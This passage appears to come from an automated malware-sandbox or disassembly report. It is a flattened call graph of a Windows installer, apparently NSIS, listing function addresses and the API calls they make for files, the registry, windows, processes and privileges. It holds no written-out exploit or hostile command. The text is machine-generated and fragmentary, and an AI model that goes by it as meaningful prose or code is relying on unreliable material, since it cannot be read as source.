5389->5388 5390 406133 5389->5390 5391 4060bc WriteFile 5390->5391 5391->5387 5392->5372 4597 40176f 4598 402da6 17 API calls 4597->4598 4599 401776 4598->4599 4600 401796 4599->4600 4601 40179e 4599->4601 4636 40651a lstrcpynW 4600->4636 4637 40651a lstrcpynW 4601->4637 4604 40179c 4608 4067a1 5 API calls 4604->4608 4605 4017a9 4606 405de9 3 API calls 4605->4606 4607 4017af lstrcatW 4606->4607 4607->4604 4612 4017bb 4608->4612 4609 406850 2 API calls 4609->4612 4610 405fe5 2 API calls 4610->4612 4612->4609 4612->4610 4613 4017cd CompareFileTime 4612->4613 4614 40188d 4612->4614 4615 401864 4612->4615 4618 40651a lstrcpynW 4612->4618 4624 406557 17 API calls 4612->4624 4632 405b7a MessageBoxIndirectW 4612->4632 4635 40600a GetFileAttributesW CreateFileW 4612->4635 4613->4612 4616 40557c 24 API calls 4614->4616 4617 40557c 24 API calls 4615->4617 4633 401879 4615->4633 4619 401897 4616->4619 4617->4633 4618->4612 4620 4032b4 31 API calls 4619->4620 4621 4018aa 4620->4621 4622 4018be SetFileTime 4621->4622 4623 4018d0 FindCloseChangeNotification 4621->4623 4622->4623 4625 4018e1 4623->4625 4623->4633 4624->4612 4626 4018e6 4625->4626 4627 4018f9 4625->4627 4628 406557 17 API calls 4626->4628 4629 406557 17 API calls 4627->4629 4630 4018ee lstrcatW 4628->4630 4631 401901 4629->4631 4630->4631 4631->4633 4634 405b7a MessageBoxIndirectW 4631->4634 4632->4612 4634->4633 4635->4612 4636->4604 4637->4605 5393 4054f0 5394 405500 5393->5394 5395 405514 5393->5395 5396 405506 5394->5396 5405 40555d 5394->5405 5397 405533 5395->5397 5398 40551c IsWindowVisible 5395->5398 5400 4044c2 SendMessageW 5396->5400 5399 405562 CallWindowProcW 5397->5399 5404 404eb1 4 API calls 5397->5404 5401 405529 5398->5401 5398->5405 5402 405510 5399->5402 5400->5402 5403 404e31 5 API calls 5401->5403 5403->5397 5404->5405 5405->5399 5406 401a72 5407 402d84 17 API calls 5406->5407 5408 401a7b 5407->5408 5409 402d84 17 API calls 5408->5409 5410 401a20 5409->5410 5411 401573 5412 401583 ShowWindow 5411->5412 5413 40158c 5411->5413 5412->5413 5414 40159a ShowWindow 5413->5414 5415 402c2a 5413->5415 5414->5415 5416 4023f4 5417 402da6 17 API calls 5416->5417 5418 402403 5417->5418 5419 402da6 17 API calls 5418->5419 5420 40240c 5419->5420 5421 402da6 17 API calls 5420->5421 5422 402416 GetPrivateProfileStringW 5421->5422 5423 4014f5 SetForegroundWindow 5424 402c2a 5423->5424 5425 401ff6 5426 402da6 17 API calls 5425->5426 5427 401ffd 5426->5427 5428 406850 2 API calls 5427->5428 5429 402003 5428->5429 5431 402014 5429->5431 5432 406461 wsprintfW 5429->5432 5432->5431 4659 403f77 4660 4040f0 4659->4660 4661 403f8f 4659->4661 4663 404101 GetDlgItem GetDlgItem 4660->4663 4664 404141 4660->4664 4661->4660 4662 403f9b 4661->4662 4666 403fa6 SetWindowPos 4662->4666 4667 403fb9 4662->4667 4732 404476 4663->4732 4665 40419b 4664->4665 4673 401389 2 API calls 4664->4673 4669 4044c2 SendMessageW 4665->4669 4686 4040eb 4665->4686 4666->4667 4670 403fc2 ShowWindow 4667->4670 4671 404004 4667->4671 4704 4041ad 4669->4704 4674 403fe2 GetWindowLongW 4670->4674 4675 4040dd 4670->4675 4676 404023 4671->4676 4677 40400c DestroyWindow 4671->4677 4672 40412b KiUserCallbackDispatcher 4678 40140b 2 API calls 4672->4678 4681 404173 4673->4681 4674->4675 4683 403ffb ShowWindow 4674->4683 4741 4044dd 4675->4741 4679 404028 SetWindowLongW 4676->4679 4680 404039 4676->4680 4731 4043ff 4677->4731 4678->4664 4679->4686 4680->4675 4684 404045 GetDlgItem 4680->4684 4681->4665 4685 404177 SendMessageW 4681->4685 4683->4671 4689 404073 4684->4689 4690 404056 SendMessageW IsWindowEnabled 4684->4690 4685->4686 4687 40140b 2 API calls 4687->4704 4688 404401 DestroyWindow EndDialog 4688->4731 4692 404078 4689->4692 4694 404080 4689->4694 4696 4040c7 SendMessageW 4689->4696 4697 404093 4689->4697 4690->4686 4690->4689 4691 404430 ShowWindow 4691->4686 4738 40444f 4692->4738 4693 406557 17 API calls 4693->4704 4694->4692 4694->4696 4696->4675 4699 4040b0 4697->4699 4700 40409b 4697->4700 4698 4040ae 4698->4675 4702 40140b 2 API calls 4699->4702 4703 40140b 2 API calls 4700->4703 4701 404476 18 API calls 4701->4704 4705 4040b7 4702->4705 4703->4692 4704->4686 4704->4687 4704->4688 4704->4693 4704->4701 4706 404476 18 API calls 4704->4706 4722 404341 DestroyWindow 4704->4722 4705->4675 4705->4692 4707 404228 GetDlgItem 4706->4707 4708 404245 ShowWindow KiUserCallbackDispatcher 4707->4708 4709 40423d 4707->4709 4735 404498 KiUserCallbackDispatcher 4708->4735 4709->4708 4711 40426f EnableWindow 4716 404283 4711->4716 4712 404288 GetSystemMenu EnableMenuItem SendMessageW 4713 4042b8 SendMessageW 4712->4713 4712->4716 4713->4716 4715 403f58 18 API calls 4715->4716 4716->4712 4716->4715 4736 4044ab SendMessageW 4716->4736 4737 40651a lstrcpynW 4716->4737 4718 4042e7 lstrlenW 4719 406557 17 API calls 4718->4719 4720 4042fd SetWindowTextW 4719->4720 4721 401389 2 API calls 4720->4721 4721->4704 4723 40435b CreateDialogParamW 4722->4723 4722->4731 4724 40438e 4723->4724 4723->4731 4725 404476 18 API calls 4724->4725 4726 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4725->4726 4727 401389 2 API calls 4726->4727 4728 4043df 4727->4728 4728->4686 4729 4043e7 ShowWindow 4728->4729 4730 4044c2 SendMessageW 4729->4730 4730->4731 4731->4686 4731->4691 4733 406557 17 API calls 4732->4733 4734 404481 SetDlgItemTextW 4733->4734 4734->4672 4735->4711 4736->4716 4737->4718 4739 404456 4738->4739 4740 40445c SendMessageW 4738->4740 4739->4740 4740->4698 4742 4044f5 GetWindowLongW 4741->4742 4751 4045a0 4741->4751 4743 40450a 4742->4743 4742->4751 4744 404537 GetSysColor 4743->4744 4745 40453a 4743->4745 4743->4751 4744->4745 4746 404540 SetTextColor 4745->4746 4747 40454a SetBkMode 4745->4747 4746->4747 4748 404562 GetSysColor 4747->4748 4749 404568 4747->4749 4748->4749 4750 40456f SetBkColor 4749->4750 4752 404579 4749->4752 4750->4752 4751->4686 4752->4751 4753 404593 CreateBrushIndirect 4752->4753 4754 40458c DeleteObject 4752->4754 4753->4751 4754->4753 5433 401b77 5434 402da6 17 API calls 5433->5434 5435 401b7e 5434->5435 5436 402d84 17 API calls 5435->5436 5437 401b87 wsprintfW 5436->5437 5438 402c2a 5437->5438 5439 40167b 5440 402da6 17 API calls 5439->5440 5441 401682 5440->5441 5442 402da6 17 API calls 5441->5442 5443 40168b 5442->5443 5444 402da6 17 API calls 5443->5444 5445 401694 MoveFileW 5444->5445 5446 4016a0 5445->5446 5447 4016a7 5445->5447 5448 401423 24 API calls 5446->5448 5449 406850 2 API calls 5447->5449 5451 4022f6 5447->5451 5448->5451 5450 4016b6 5449->5450 5450->5451 5452 4062da 36 API calls 5450->5452 5452->5446 5453 4022ff 5454 402da6 17 API calls 5453->5454 5455 402305 5454->5455 5456 402da6 17 API calls 5455->5456 5457 40230e 5456->5457 5458 402da6 17 API calls 5457->5458 5459 402317 5458->5459 5460 406850 2 API calls 5459->5460 5461 402320 5460->5461 5462 402331 lstrlenW lstrlenW 5461->5462 5466 402324 5461->5466 5464 40557c 24 API calls 5462->5464 5463 40557c 24 API calls 5467 40232c 5463->5467 5465 40236f SHFileOperationW 5464->5465 5465->5466 5465->5467 5466->5463 5466->5467 5468 4019ff 5469 402da6 17 API calls 5468->5469 5470 401a06 5469->5470 5471 402da6 17 API calls 5470->5471 5472 401a0f 5471->5472 5473 401a16 lstrcmpiW 5472->5473 5474 401a28 lstrcmpW 5472->5474 5475 401a1c 5473->5475 5474->5475 5476 401000 5477 401037 BeginPaint GetClientRect 5476->5477 5478 40100c DefWindowProcW 5476->5478 5480 4010f3 5477->5480 5481 401179 5478->5481 5482 401073 CreateBrushIndirect FillRect DeleteObject 5480->5482 5483 4010fc 5480->5483 5482->5480 5484 401102 CreateFontIndirectW 5483->5484 5485 401167 EndPaint 5483->5485 5484->5485 5486 401112 6 API calls 5484->5486 5485->5481 5486->5485 5487 401d81 5488 401d94 GetDlgItem 5487->5488 5489 401d87 5487->5489 5491 401d8e 5488->5491 5490 402d84 17 API calls 5489->5490 5490->5491 5492 401dd5 GetClientRect LoadImageW SendMessageW 5491->5492 5493 402da6 17 API calls 5491->5493 5495 401e33 5492->5495 5497 401e3f 5492->5497 5493->5492 5496 401e38 DeleteObject 5495->5496 5495->5497 5496->5497 5498 732a23e9 5499 732a2453 5498->5499 5500 732a245e GlobalAlloc 5499->5500 5501 732a247d 5499->5501 5500->5499 5502 401503 5503 40150b 5502->5503 5505 40151e 5502->5505 5504 402d84 17 API calls 5503->5504 5504->5505 5506 402383 5507 40239d 5506->5507 5508 40238a 5506->5508 5509 406557 17 API calls 5508->5509 5510 402397 5509->5510 5510->5507 5511 405b7a MessageBoxIndirectW 5510->5511 5511->5507 5512 402c05 SendMessageW 5513 402c2a 5512->5513 5514 402c1f InvalidateRect 5512->5514 5514->5513 5515 403b87 5516 403b92 5515->5516 5517 403b96 5516->5517 5518 403b99 GlobalAlloc 5516->5518 5518->5517 4291 40350a SetErrorMode GetVersionExW 4292 403594 4291->4292 4293 40355c GetVersionExW 4291->4293 4294 4035ed 4292->4294 4295 4068e7 5 API calls 4292->4295 4293->4292 4296 406877 3 API calls 4294->4296 4295->4294 4297 403603 lstrlenA 4296->4297 4297->4294 4298 403613 4297->4298 4299 4068e7 5 API calls 4298->4299 4300 40361a 4299->4300 4301 4068e7 5 API calls 4300->4301 4302 403621 4301->4302 4303 4068e7 5 API calls 4302->4303 4304 40362d #17 OleInitialize SHGetFileInfoW 4303->4304 4382 40651a lstrcpynW 4304->4382 4307 40367a GetCommandLineW 4383 40651a lstrcpynW 4307->4383 4309 40368c 4310 405e16 CharNextW 4309->4310 4311 4036b2 CharNextW 4310->4311 4319 4036c3 4311->4319 4312 4037c1 4313 4037d5 GetTempPathW 4312->4313 4384 4034d9 4313->4384 4315 4037ed 4316 4037f1 GetWindowsDirectoryW lstrcatW 4315->4316 4317 403847 DeleteFileW 4315->4317 4320 4034d9 12 API calls 4316->4320 4394 40307d GetTickCount GetModuleFileNameW 4317->4394 4318 405e16 CharNextW 4318->4319 4319->4312 4319->4318 4326 4037c3 4319->4326 4323 40380d 4320->4323 4322 40385a 4324 40391e 4322->4324 4327 40390f 4322->4327 4331 405e16 CharNextW 4322->4331 4323->4317 4325 403811 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4323->4325 4486 403aef 4324->4486 4330 4034d9 12 API calls 4325->4330 4478 40651a lstrcpynW 4326->4478 4422 403bc9 4327->4422 4334 40383f 4330->4334 4347 40387c 4331->4347 4334->4317 4334->4324 4335 403a46 4493 405b7a 4335->4493 4336 403a5b 4338 403a63 GetCurrentProcess OpenProcessToken 4336->4338 4339 403ad9 ExitProcess 4336->4339 4344 403aa9 4338->4344 4345 403a7a LookupPrivilegeValueW AdjustTokenPrivileges 4338->4345 4341 4038e5 4349 405ef1 18 API calls 4341->4349 4342 403926 4348 405ae5 5 API calls 4342->4348 4346 4068e7 5 API calls 4344->4346 4345->4344 4350 403ab0 4346->4350 4347->4341 4347->4342 4351 40392b lstrcatW 4348->4351 4352 4038f1 4349->4352 4353 403ac5 ExitWindowsEx 4350->4353 4356 403ad2 4350->4356 4354 403947 lstrcatW lstrcmpiW 4351->4354 4355 40393c lstrcatW 4351->4355 4352->4324 4479 40651a lstrcpynW 4352->4479 4353->4339 4353->4356 4354->4324 4357 403967 4354->4357 4355->4354 4497 40140b 4356->4497 4361 403973 4357->4361 4362 40396c 4357->4362 4359 403904 4480 40651a lstrcpynW 4359->4480 4363 405ac8 2 API calls 4361->4363 4365 405a4b 4 API calls 4362->4365 4366 403978 SetCurrentDirectoryW 4363->4366 4367 403971 4365->4367 4368 403995 4366->4368 4369 40398a 4366->4369 4367->4366 4482 40651a lstrcpynW 4368->4482 4481 40651a lstrcpynW 4369->4481 4372 406557 17 API calls 4373 4039d7 DeleteFileW 4372->4373 4374 4039e3 CopyFileW 4373->4374 4379 4039a2 4373->4379 4374->4379 4375 403a2d 4376 4062da 36 API calls 4375->4376 4376->4324 4377 4062da 36 API calls 4377->4379 4378 406557 17 API calls 4378->4379 4379->4372 4379->4375 4379->4377 4379->4378 4381 403a17 CloseHandle 4379->4381 4483 405afd CreateProcessW 4379->4483 4381->4379 4382->4307 4383->4309 4385 4067a1 5 API calls 4384->4385 4386 4034e5 4385->4386 4387 4034ef 4386->4387 4388 405de9 3 API calls 4386->4388 4387->4315 4389 4034f7 4388->4389 4390 405ac8 2 API calls 4389->4390 4391 4034fd 4390->4391 4500 406039 4391->4500 4504 40600a GetFileAttributesW CreateFileW 4394->4504 4396 4030bd 4416 4030cd 4396->4416 4505 40651a lstrcpynW 4396->4505 4398 4030e3 4399 405e35 2 API calls 4398->4399 4400 4030e9 4399->4400 4506 40651a lstrcpynW 4400->4506 4402 4030f4 GetFileSize 4403 4031ee 4402->4403 4421 40310b 4402->4421 4507 403019 4403->4507 4405 4031f7 4407 403227 GlobalAlloc 4405->4407 4405->4416 4542 4034c2 SetFilePointer 4405->4542 4518 4034c2 SetFilePointer 4407->4518 4409 40325a 4413 403019 6 API calls 4409->4413 4411 403210 4414 4034ac ReadFile 4411->4414 4412 403242 4519 4032b4 4412->4519 4413->4416 4417 40321b 4414->4417 4416->4322 4417->4407 4417->4416 4418 403019 6 API calls 4418->4421 4419 40324e 4419->4416 4419->4419 4420 40328b SetFilePointer 4419->4420 4420->4416 4421->4403 4421->4409 4421->4416 4421->4418 4539 4034ac 4421->4539 4423 4068e7 5 API calls 4422->4423 4424 403bdd 4423->4424 4425 403be3 4424->4425 4426 403bf5 4424->4426 4563 406461 wsprintfW 4425->4563 4427 4063e8 3 API calls 4426->4427 4428 403c25 4427->4428 4430 403c44 lstrcatW 4428->4430 4431 4063e8 3 API calls 4428->4431 4432 403bf3 4430->4432 4431->4430 4548 403e9f 4432->4548 4435 405ef1 18 API calls 4436 403c76 4435->4436 4437 403d0a 4436->4437 4439 4063e8 3 API calls 4436->4439 4438 405ef1 18 API calls 4437->4438 4440 403d10 4438->4440 4441 403ca8 4439->4441 4442 403d20 LoadImageW 4440->4442 4443 406557 17 API calls 4440->4443 4441->4437 4449 403cc9 lstrlenW 4441->4449 4453 405e16 CharNextW 4441->4453 4444 403dc6 4442->4444 4445 403d47 RegisterClassW 4442->4445 4443->4442 4448 40140b 2 API calls 4444->4448 4446 403dd0 4445->4446 4447 403d7d SystemParametersInfoW CreateWindowExW 4445->4447 4446->4324 4447->4444 4452 403dcc 4448->4452 4450 403cd7 lstrcmpiW 4449->4450 4451 403cfd 4449->4451 4450->4451 4454 403ce7 GetFileAttributesW 4450->4454 4455 405de9 3 API calls 4451->4455 4452->4446 4458 403e9f 18 API calls 4452->4458 4456 403cc6 4453->4456 4457 403cf3 4454->4457 4459 403d03 4455->4459 4456->4449 4457->4451 4460 405e35 2 API calls 4457->4460 4461 403ddd 4458->4461 4564 40651a lstrcpynW 4459->4564 4460->4451 4463 403de9 ShowWindow 4461->4463 4464 403e6c 4461->4464 4466 406877 3 API calls 4463->4466 4556 40564f OleInitialize 4464->4556 4468 403e01 4466->4468 4467 403e72 4469 403e76 4467->4469 4470 403e8e 4467->4470 4471 403e0f GetClassInfoW 4468->4471 4473 406877 3 API calls 4468->4473 4469->4446 4477 40140b 2 API calls 4469->4477 4472 40140b 2 API calls 4470->4472 4474 403e23 GetClassInfoW RegisterClassW 4471->4474 4475 403e39 DialogBoxParamW 4471->4475 4472->4446 4473->4471 4474->4475 4476 40140b 2 API calls 4475->4476 4476->4446 4477->4446 4478->4313 4479->4359 4480->4327 4481->4368 4482->4379 4484 405b30 CloseHandle 4483->4484 4485 405b3c 4483->4485 4484->4485 4485->4379 4487 403b07 4486->4487 4488 403af9 CloseHandle 4486->4488 4576 403b34 4487->4576 4488->4487 4491 405c26 67 API calls 4492 403a3b OleUninitialize 4491->4492 4492->4335 4492->4336 4494 405b8f 4493->4494 4495 403a53 ExitProcess 4494->4495 4496 405ba3 MessageBoxIndirectW 4494->4496 4496->4495 4498 401389 2 API calls 4497->4498 4499 401420 4498->4499 4499->4339 4501 406046 GetTickCount GetTempFileNameW 4500->4501 4502 403508 4501->4502 4503 40607c 4501->4503 4502->4315 4503->4501 4503->4502 4504->4396 4505->4398 4506->4402 4508 403022 4507->4508 4509 40303a 4507->4509 4510 403032 4508->4510 4511 40302b DestroyWindow 4508->4511 4512 403042 4509->4512 4513 40304a GetTickCount 4509->4513 4510->4405 4511->4510 4543 406923 4512->4543 4515 403058 CreateDialogParamW ShowWindow 4513->4515 4516 40307b 4513->4516 4515->4516 4516->4405 4518->4412 4520 4032cd 4519->4520 4521 4032fb 4520->4521 4547 4034c2 SetFilePointer 4520->4547 4523 4034ac ReadFile 4521->4523 4524 403306 4523->4524 4525 40342f 4524->4525 4526 403445 4524->4526 4527 403318 GetTickCount 4524->4527 4525->4419 4528 403487 4526->4528 4531 403449 4526->4531 4527->4525 4533 403344 4527->4533 4529 4034ac ReadFile 4528->4529 4529->4525 4530 4034ac ReadFile 4530->4533 4531->4525 4532 4034ac ReadFile 4531->4532 4534 4060bc WriteFile 4531->4534 4532->4531 4533->4525 4533->4530 4535 40339a GetTickCount 4533->4535 4536 4033bf MulDiv wsprintfW 4533->4536 4538 4060bc WriteFile 4533->4538 4534->4531 4535->4533 4537 40557c 24 API calls 4536->4537 4537->4533 4538->4533 4540 40608d ReadFile 4539->4540 4541 4034bf 4540->4541 4541->4421 4542->4411 4544 406940 PeekMessageW 4543->4544 4545 403048 4544->4545 4546 406936 DispatchMessageW 4544->4546 4545->4405 4546->4544 4547->4521 4549 403eb3 4548->4549 4565 406461 wsprintfW 4549->4565 4551 403f24 4566 403f58 4551->4566 4553 403f29 4554 403c54 4553->4554 4555 406557 17 API calls 4553->4555 4554->4435 4555->4553 4569 4044c2 4556->4569 4558 405672 4562 405699 4558->4562 4572 401389 4558->4572 4559 4044c2 SendMessageW 4560 4056ab OleUninitialize 4559->4560 4560->4467 4562->4559 4563->4432 4564->4437 4565->4551 4567 406557 17 API calls 4566->4567 4568 403f66 SetWindowTextW 4567->4568 4568->4553 4570 4044da 4569->4570 4571 4044cb SendMessageW 4569->4571 4570->4558 4571->4570 4574 401390 4572->4574 4573 4013fe 4573->4558 4574->4573 4575 4013cb MulDiv SendMessageW 4574->4575 4575->4574 4577 403b42 4576->4577 4578 403b0c 4577->4578 4579 403b47 FreeLibrary GlobalFree 4577->4579 4578->4491 4579->4578 4579->4579 5519 40248a 5520 402da6 17 API calls 5519->5520 5521 40249c 5520->5521 5522 402da6 17 API calls 5521->5522 5523 4024a6 5522->5523 5536 402e36 5523->5536 5526 402c2a 5527 4024de 5530 402d84 17 API calls 5527->5530 5532 4024ea 5527->5532 5528 402da6 17 API calls 5529 4024d4 lstrlenW 5528->5529 5529->5527 5530->5532 5531 402509 RegSetValueExW 5534 40251f RegCloseKey 5531->5534 5532->5531 5533 4032b4 31 API calls 5532->5533 5533->5531 5534->5526 5537 402e51 5536->5537 5540 4063b5 5537->5540 5541 4063c4 5540->5541 5542 4024b6 5541->5542 5543 4063cf RegCreateKeyExW 5541->5543 5542->5526 5542->5527 5542->5528 5543->5542 5544 40290b 5545 402da6 17 API calls 5544->5545 5546 402912 FindFirstFileW 5545->5546 5547 40293a 5546->5547 5551 402925 5546->5551 5548 402943 5547->5548 5552 406461 wsprintfW 5547->5552 5553 40651a lstrcpynW 5548->5553 5552->5548 5553->5551 5554 732a10e1 5564 732a1111 5554->5564 5555 732a12b0 GlobalFree 5556 732a1240 GlobalFree 5556->5564 5557 732a11d7 GlobalAlloc 5557->5564 5558 732a12ab 5558->5555 5559 732a135a 2 API calls 5559->5564 5560 732a129a GlobalFree 5560->5564 5561 732a1312 2 API calls 5561->5564 5562 732a116b GlobalAlloc 5562->5564 5563 732a1381 lstrcpyW 5563->5564 5564->5555 5564->5556 5564->5557 5564->5558 5564->5559 5564->5560 5564->5561 5564->5562 5564->5563 5565 40190c 5566 401943 5565->5566 5567 402da6 17 API calls 5566->5567 5568 401948 5567->5568 5569 405c26 67 API calls 5568->5569 5570 401951 5569->5570 5571 40190f 5572 402da6 17 API calls 5571->5572 5573 401916 5572->5573 5574 405b7a MessageBoxIndirectW 5573->5574 5575 40191f 5574->5575 5576 401491 5577 40557c 24 API calls 5576->5577 5578 401498 5577->5578 5579 402891 5580 402898 5579->5580 5581 402ba9 5579->5581 5582 402d84 17 API calls 5580->5582 5583 40289f 5582->5583 5584 4028ae SetFilePointer 5583->5584 5584->5581 5585 4028be 5584->5585 5587 406461 wsprintfW 5585->5587 5587->5581 5588 401f12 5589 402da6 17 API calls 5588->5589 5590 401f18 5589->5590 5591 402da6 17 API calls 5590->5591 5592 401f21 5591->5592 5593 402da6 17 API calls 5592->5593 5594 401f2a 5593->5594 5595 402da6 17 API calls 5594->5595 5596 401f33 5595->5596 5597 401423 24 API calls 5596->5597 5598 401f3a 5597->5598 5605 405b40 ShellExecuteExW 5598->5605 5600 401f82 5602 40292e 5600->5602 5606 406992 WaitForSingleObject 5600->5606 5603 401f9f CloseHandle 5603->5602 5605->5600 5607 4069ac 5606->5607 5608 4069be GetExitCodeProcess 5607->5608 5609 406923 2 API calls 5607->5609 5608->5603 5610 4069b3 WaitForSingleObject 5609->5610 5610->5607 5611 732a1979 5612 732a199c 5611->5612 5613 732a19d1 GlobalFree 5612->5613 5614 732a19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5612->5614 5613->5614 5615 732a1312 2 API calls 5614->5615 5616 732a1b6e GlobalFree GlobalFree 5615->5616 5617 402f93 5618 402fa5 SetTimer 5617->5618 5619 402fbe 5617->5619 5618->5619 5620 403013 5619->5620 5621 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5619->5621 5621->5620 4648 732a2a7f 4649 732a2acf 4648->4649 4650 732a2a8f VirtualProtect 4648->4650 4650->4649 5622 401d17 5623 402d84 17 API calls 5622->5623 5624 401d1d IsWindow 5623->5624 5625 401a20 5624->5625 4949 401b9b 4950 401bec 4949->4950 4951 401ba8 4949->4951 4953 401bf1 4950->4953 4954 401c16 GlobalAlloc 4950->4954 4952 401c31 4951->4952 4959 401bbf 4951->4959 4956 406557 17 API calls 4952->4956 4962 40239d 4952->4962 4953->4962 4970 40651a lstrcpynW 4953->4970 4955 406557 17 API calls 4954->4955 4955->4952 4958 402397 4956->4958 4958->4962 4963 405b7a MessageBoxIndirectW 4958->4963 4968 40651a lstrcpynW 4959->4968 4960 401c03 GlobalFree 4960->4962 4963->4962 4964 401bce 4969 40651a lstrcpynW 4964->4969 4966 401bdd 4971 40651a lstrcpynW 4966->4971 4968->4964 4969->4966 4970->4960 4971->4962 5626 40261c 5627 402da6 17 API calls 5626->5627 5628 402623 5627->5628 5631 40600a GetFileAttributesW CreateFileW 5628->5631 5630 40262f 5631->5630 5632 732a1774 5633 732a17a3 5632->5633 5634 732a1bff 22 API calls 5633->5634 5635 732a17aa 5634->5635 5636 732a17bd 5635->5636 5637 732a17b1 5635->5637 5639 732a17c7 5636->5639 5640 732a17e4 5636->5640 5638 732a1312 2 API calls 5637->5638 5643 732a17bb 5638->5643 5644 732a15dd 3 API calls 5639->5644 5641 732a17ea 5640->5641 5642 732a180e 5640->5642 5646 732a1654 3 API calls 5641->5646 5647 732a15dd 3 API calls 5642->5647 5645 732a17cc 5644->5645 5648 732a1654 3 API calls 5645->5648 5649 732a17ef 5646->5649 5647->5643 5650 732a17d2 5648->5650 5651 732a1312 2 API calls 5649->5651 5652 732a1312 2 API calls 5650->5652 5653 732a17f5 GlobalFree 5651->5653 5654 732a17d8 GlobalFree 5652->5654 5653->5643 5655 732a1809 GlobalFree 5653->5655 5654->5643 5655->5643 5656 40149e 5657 4014ac PostQuitMessage 5656->5657 5658 40239d 5656->5658 5657->5658 5659 40259e 5660 402de6 17 API calls 5659->5660 5661 4025a8 5660->5661 5662 402d84 17 API calls 5661->5662 5663 4025b1 5662->5663 5664 4025d9 RegEnumValueW 5663->5664 5665 4025cd RegEnumKeyW 5663->5665 5667 40292e 5663->5667 5666 4025ee RegCloseKey 5664->5666 5665->5666 5666->5667 5669 404920 5670 404930 5669->5670 5671 404956 5669->5671 5672 404476 18 API calls 5670->5672 5673 4044dd 8 API calls 5671->5673 5674 40493d SetDlgItemTextW 5672->5674 5675 404962 5673->5675 5674->5671 4287 4015a3 4288 402da6 17 API calls 4287->4288 4289 4015aa SetFileAttributesW 4288->4289 4290 4015bc 4289->4290 5676 401fa4 5677 402da6 17 API calls 5676->5677 5678 401faa 5677->5678 5679 40557c 24 API calls 5678->5679 5680 401fb4 5679->5680 5681 405afd 2 API calls 5680->5681 5682 401fba 5681->5682 5684 406992 5 API calls 5682->5684 5685 40292e 5682->5685 5687 401fdd CloseHandle 5682->5687 5686 401fcf 5684->5686 5686->5687 5689 406461 wsprintfW 5686->5689 5687->5685 5689->5687 5690 732a2d43 5691 732a2d5b 5690->5691 5692 732a162f 2 API calls 5691->5692 5693 732a2d76 5692->5693 4580 40252a 4591 402de6 4580->4591 4583 402da6 17 API calls 4584 40253d 4583->4584 4585 402548 RegQueryValueExW 4584->4585 4588 40292e 4584->4588 4586 40256e RegCloseKey 4585->4586 4587 402568 4585->4587 4586->4588 4587->4586 4596 406461 wsprintfW 4587->4596 4592 402da6 17 API calls 4591->4592 4593 402dfd 4592->4593 4594 406387 RegOpenKeyExW 4593->4594 4595 402534 4594->4595 4595->4583 4596->4586 5694 40202a 5695 402da6 17 API calls 5694->5695 5696 402031 5695->5696 5697 4068e7 5 API calls 5696->5697 5698 402040 5697->5698 5699 4020cc 5698->5699 5700 40205c GlobalAlloc 5698->5700 5700->5699 5701 402070 5700->5701 5702 4068e7 5 API calls 5701->5702 5703 402077 5702->5703 5704 4068e7 5 API calls 5703->5704 5705 402081 5704->5705 5705->5699 5709 406461 wsprintfW 5705->5709 5707 4020ba 5710 406461 wsprintfW 5707->5710 5709->5707 5710->5699 5711 4021aa 5712 402da6 17 API calls 5711->5712 5713 4021b1 5712->5713 5714 402da6 17 API calls 5713->5714 5715 4021bb 5714->5715 5716 402da6 17 API calls 5715->5716 5717 4021c5 5716->5717 5718 402da6 17 API calls 5717->5718 5719 4021cf 5718->5719 5720 402da6 17 API calls 5719->5720 5721 4021d9 5720->5721 5722 402218 CoCreateInstance 5721->5722 5723 402da6 17 API calls 5721->5723 5726 402237 5722->5726 5723->5722 5724 401423 24 API calls 5725 4022f6 5724->5725 5726->5724 5726->5725 5727 4045ac lstrcpynW lstrlenW 5728 401a30 5729 402da6 17 API calls 5728->5729 5730 401a39 ExpandEnvironmentStringsW 5729->5730 5731 401a4d 5730->5731 5733 401a60 5730->5733 5732 401a52 lstrcmpW 5731->5732 5731->5733 5732->5733 4638 4023b2 4639 4023c0 4638->4639 4640 4023ba 4638->4640 4642 4023ce 4639->4642 4643 402da6 17 API calls 4639->4643 4641 402da6 17 API calls 4640->4641 4641->4639 4644 4023dc 4642->4644 4645 402da6 17 API calls 4642->4645 4643->4642 4646 402da6 17 API calls 4644->4646 4645->4644 4647 4023e5 WritePrivateProfileStringW 4646->4647 5739 732a1058 5740 732a1074 5739->5740 5741 732a10dd 5740->5741 5742 732a15b6 GlobalFree 5740->5742 5743 732a1092 5740->5743 5742->5743 5744 732a15b6 GlobalFree 5743->5744 5745 732a10a2 5744->5745 5746 732a10a9 GlobalSize 5745->5746 5747 732a10b2 5745->5747 5746->5747 5748 732a10c7 5747->5748 5749 732a10b6 GlobalAlloc 5747->5749 5751 732a10d2 GlobalFree 5748->5751 5750 732a15dd 3 API calls 5749->5750 5750->5748 5751->5741 5752 402434 5753 402467 5752->5753 5754 40243c 5752->5754 5755 402da6 17 API calls 5753->5755 5756 402de6 17 API calls 5754->5756 5757 40246e 5755->5757 5758 402443 5756->5758 5763 402e64 5757->5763 5760 402da6 17 API calls 5758->5760 5762 40247b 5758->5762 5761 402454 RegDeleteValueW RegCloseKey 5760->5761 5761->5762 5764 402e78 5763->5764 5766 402e71 5763->5766 5764->5766 5767 402ea9 5764->5767 5766->5762 5768 406387 RegOpenKeyExW 5767->5768 5769 402ed7 5768->5769 5770 402ee7 RegEnumValueW 5769->5770 5771 402f0a 5769->5771 5778 402f81 5769->5778 5770->5771 5772 402f71 RegCloseKey 5770->5772 5771->5772 5773 402f46 RegEnumKeyW 5771->5773 5774 402f4f RegCloseKey 5771->5774 5777 402ea9 6 API calls 5771->5777 5772->5778 5773->5771 5773->5774 5775 4068e7 5 API calls 5774->5775 5776 402f5f 5775->5776 5776->5778 5779 402f63 RegDeleteKeyW 5776->5779 5777->5771 5778->5766 5779->5778 5780 404635 5781 40464d 5780->5781 5785 404767 5780->5785 5786 404476 18 API calls 5781->5786 5782 4047d1 5783 40489b 5782->5783 5784 4047db GetDlgItem 5782->5784 5791 4044dd 8 API calls 5783->5791 5787 4047f5 5784->5787 5788 40485c 5784->5788 5785->5782 5785->5783 5789 4047a2 GetDlgItem SendMessageW 5785->5789 5790 4046b4 5786->5790 5787->5788 5795 40481b SendMessageW LoadCursorW SetCursor 5787->5795 5788->5783 5796 40486e 5788->5796 5813 404498 KiUserCallbackDispatcher 5789->5813 5793 404476 18 API calls 5790->5793 5794 404896 